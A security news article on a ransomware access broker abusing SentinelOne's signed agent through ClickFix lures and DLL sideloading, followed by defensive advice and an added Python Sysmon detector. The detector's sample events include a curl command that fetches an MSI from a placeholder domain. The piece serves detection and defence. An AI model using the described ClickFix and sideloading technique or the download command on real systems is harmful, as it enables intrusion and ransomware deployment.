Ransomware IAB abuses EDR for stealthy malware execution

A ransomware initial access broker (IAB) tracked as Storm-0249 has been observed abusing trusted Endpoint Detection and Response (EDR) solutions—specifically SentinelOne components—to execute malware stealthily and establish persistence on victim systems. 

This technique lets attackers blend malicious activity with legitimate security processes: because the payload runs inside the EDR's own signed process, its actions look like routine EDR operations to other security controls. While the analyzed campaign targeted SentinelOne, researchers note that the same approach could apply to other EDR products. Storm-0249, linked to affiliates of ransomware groups such as LockBit and ALPHV (BlackCat), uses this method to prepare environments for data exfiltration and encryption.

Attack Chain

The intrusion begins with ClickFix social engineering: victims are tricked into pasting a malicious curl command into the Windows Run dialog. The command downloads an MSI installer from a spoofed Microsoft domain, and the installer runs with SYSTEM privileges. To avoid disk-based detection, a malicious PowerShell script is then fetched and executed directly in memory, so it is never written to disk where file-based antivirus scanning would see it.

The MSI then drops a malicious DLL named SentinelAgentCore.dll next to the legitimate, signed SentinelAgentWorker.exe (part of SentinelOne’s EDR agent). Because Windows resolves a DLL name by searching the application’s own directory before the system directories, the EDR process loads the attacker’s DLL instead of a legitimate one (DLL sideloading), and the payload runs inside a signed, privileged process under the guise of trusted activity.

From there:

•  The malware profiles the system using built-in Windows utilities such as reg.exe and findstr.exe to query hardware and host details (e.g., reading the MachineGuid value under HKLM\SOFTWARE\Microsoft\Cryptography to derive a unique identifier for the victim).

•  It establishes command-and-control (C2) communication over encrypted HTTPS.

•  Persistence comes from the hijacked EDR process itself: the sideloaded DLL is picked up every time the agent process runs, survives OS updates, and appears benign to security tools.

As ReliaQuest researchers explain: “The legitimate process does all the work, running the attacker’s code, appearing as routine SentinelOne activity to security tools and bypassing detection.”

Why This is Effective for Stealth

•  Living-off-the-Land Binaries (LoLBin) Abuse: Legitimate tools like curl and reg.exe rarely trigger alerts when they are spawned by a trusted EDR process.

•  Process Masquerading: Security controls often allowlist EDR processes and exclude their activity from scrutiny, so child processes and network connections from the hijacked process go unexamined.

•  Tailored for Ransomware: The setup enables lateral movement and data staging for high-impact attacks.

Defensive Recommendations

To counter this:

•  Implement behavior-based detection that flags trusted processes loading DLLs that are unsigned, signed by an unexpected publisher, or loaded from unusual paths. Note that in this campaign the DLL sat inside the agent’s own directory, so a path-only rule would miss it; the signature check is what catches it.

•  Enforce stricter controls on high-risk tools like curl, PowerShell, and other LoLBins (e.g., via AppLocker, WDAC or endpoint policies).

•  Monitor for anomalous EDR process behavior, such as unexpected DLL loads, unusual child processes or unexpected network traffic.

•  Train users to recognize ClickFix lures (any instruction to paste a command into the Run dialog or a terminal) and verify that “official” download domains genuinely belong to the vendor.
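As an added example (not code from the article or from ReliaQuest), the following Python detector applies the recommendations above to Sysmon telemetry: it flags a trusted EDR process loading a DLL that is unsigned, signed by an unexpected publisher or loaded from an unusual path, and separately flags the ClickFix stage of the attack chain (curl.exe launched from the Run dialog to fetch an MSI). The sample events, the agent install path, the accepted signer names and the explorer.exe-as-parent heuristic are assumptions constructed for illustration; only the field names follow Sysmon’s Event ID 1 (process creation) and Event ID 7 (image load) schema.

```python
"""Hunt Sysmon records for the sideload and ClickFix stages described above.

Added example, not from the article or the ReliaQuest report. Sample events,
the agent install path, accepted signer names and the Run-dialog heuristic are
constructed assumptions; field names follow Sysmon Event ID 1 and Event ID 7.
"""
import ntpath

# Assumed default install root of the EDR agent; adjust to the real one.
EDR_HOST_DIRS = ("c:\\program files\\sentinelone\\",)
# Module loads from the Windows system directories are expected.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
# Signer subjects allowed to load into the EDR process (assumption; tune per site).
ALLOWED_SIGNERS = ("sentinelone", "sentinel labs", "microsoft")


def _norm(path: str) -> str:
    """Lower-case a Windows path and unify separators for prefix matching."""
    return path.replace("/", "\\").lower()


def _in_dirs(path: str, dirs) -> bool:
    return any(path.startswith(d) for d in dirs)


def classify_image_load(ev: dict) -> list[str]:
    """Reasons a Sysmon Event ID 7 record is suspicious; empty list means benign.

    Only loads into a process running from EDR_HOST_DIRS are judged.
    """
    if ev.get("EventID") != 7:
        return []
    host = _norm(ev["Image"])
    if not _in_dirs(host, EDR_HOST_DIRS):
        return []
    loaded = _norm(ev["ImageLoaded"])
    loaded_dir = ntpath.dirname(loaded) + "\\"
    reasons = []
    # Sysmon reports Signed as "true"/"false" and SignatureStatus "Valid" for a good chain.
    signed = ev.get("Signed", "false").lower() == "true"
    valid = ev.get("SignatureStatus", "").lower() == "valid"
    if not (signed and valid):
        reasons.append("unsigned or invalid signature")
    elif not any(s in ev.get("Signature", "").lower() for s in ALLOWED_SIGNERS):
        reasons.append(f"unexpected signer: {ev.get('Signature')}")
    # Only the vendor directory and the system directories are expected module sources.
    if not (_in_dirs(loaded_dir, SYSTEM_DIRS) or _in_dirs(loaded_dir, EDR_HOST_DIRS)):
        reasons.append(f"loaded from unusual path: {loaded_dir}")
    # A module beside the host EXE that failed the checks above is the search-order
    # sideload shape from the attack chain; a path-only rule would miss it.
    if reasons and loaded_dir == ntpath.dirname(host) + "\\":
        reasons.append("module sits beside host EXE (sideload pattern)")
    return reasons


def classify_process_create(ev: dict) -> list[str]:
    """Heuristic for the ClickFix stage (assumption, not a signature from the report):
    curl.exe launched straight from explorer.exe, which backs the Run dialog, to fetch an MSI."""
    if ev.get("EventID") != 1:
        return []
    image, parent = _norm(ev.get("Image", "")), _norm(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "").lower()
    reasons = []
    if image.endswith("\\curl.exe") and parent.endswith("\\explorer.exe"):
        reasons.append("curl.exe spawned directly by explorer.exe (Run dialog or shell)")
        if ".msi" in cmd or "msiexec" in cmd:
            reasons.append("command line references an MSI package")
    return reasons


CLASSIFIERS = {1: classify_process_create, 7: classify_image_load}


def hunt(events) -> list[tuple[str, str, list[str]]]:
    """Run the matching classifier over each record and keep the hits."""
    hits = []
    for ev in events:
        reasons = CLASSIFIERS.get(ev.get("EventID"), lambda _: [])(ev)
        if reasons:
            hits.append((ev["Image"], ev.get("ImageLoaded") or ev.get("CommandLine", ""), reasons))
    return hits


# Constructed sample events (not real telemetry). Install path and domain are assumed.
_HOST = "C:\\Program Files\\SentinelOne\\Sentinel Agent\\SentinelAgentWorker.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\curl.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "curl -o C:\\Users\\Public\\update.msi https://updates.example.invalid/update.msi"},
    {"EventID": 7, "Image": _HOST, "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 7, "Image": _HOST,
     "ImageLoaded": "C:\\Program Files\\SentinelOne\\Sentinel Agent\\SentinelAgentCore.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"EventID": 7, "Image": _HOST, "ImageLoaded": "C:\\Users\\Public\\helper.dll",
     "Signed": "true", "Signature": "Contoso Ltd", "SignatureStatus": "Valid"},
    {"EventID": 7, "Image": "C:\\Windows\\System32\\notepad.exe", "ImageLoaded": "C:\\Users\\Public\\helper.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
]

if __name__ == "__main__":
    for image, target, reasons in hunt(SAMPLE_EVENTS):
        print(f"{ntpath.basename(image)} -> {target}\n    " + "\n    ".join(reasons))
```

Running the block on the constructed sample prints three hits: the curl launch from explorer.exe, the unsigned SentinelAgentCore.dll sitting beside SentinelAgentWorker.exe, and a validly signed but foreign-publisher DLL loaded from C:\Users\Public. The kernel32.dll load and the notepad.exe load are ignored, the first because it is a system module with an accepted signer, the second because notepad.exe is not in scope for the EDR-host rule. The point of the third signature branch is that a rule keyed only on "unsigned" or only on "unusual path" leaves a gap that this campaign walks through; checking who signed the module, not just whether it is signed, closes it.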

This campaign highlights the evolving risks of supply-chain-like attacks on security tools themselves. For full details, refer to the original analysis.
